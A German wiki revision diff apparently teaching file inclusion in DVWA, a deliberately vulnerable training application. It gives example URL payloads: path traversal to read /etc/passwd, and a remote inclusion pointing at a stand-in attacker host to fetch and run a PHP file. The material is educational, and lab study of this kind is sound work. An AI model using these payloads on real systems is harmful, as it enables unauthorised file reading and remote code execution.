DVWA File Inclusion: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 3: | Zeile 3: | ||
=Local File Inclusion= | =Local File Inclusion= | ||
*Ausführen einer Datei, die lokal auf dem Server vorliegt. | *Ausführen einer Datei, die lokal auf dem Server vorliegt. | ||
| − | *z.Bsp. Anpassen der URL: ...?page=../../../../../../etc/passwd | + | *z.Bsp. Anpassen der URL: ...?page=../../../../../../etc/passwd (oder auch ...?page=/etc/passwd) |
| + | |||
[[Datei:DVWA-fileinclusion-1.png|1000px]] | [[Datei:DVWA-fileinclusion-1.png|1000px]] | ||
Version vom 15. Juni 2021, 13:37 Uhr
- Tritt auf, wenn der Client die Möglichkeit hat, Dateien mitzugeben, die der Server einbindet.
Local File Inclusion
- Ausführen einer Datei, die lokal auf dem Server vorliegt.
- z.Bsp. Anpassen der URL: ...?page=../../../../../../etc/passwd (oder auch ...?page=/etc/passwd)
Remote File Inclusion
- Download und Ausführen einer Datei von extern.
- z.Bsp. Anpassen der URL: ...?page=http://www.evilsite.com/evil.php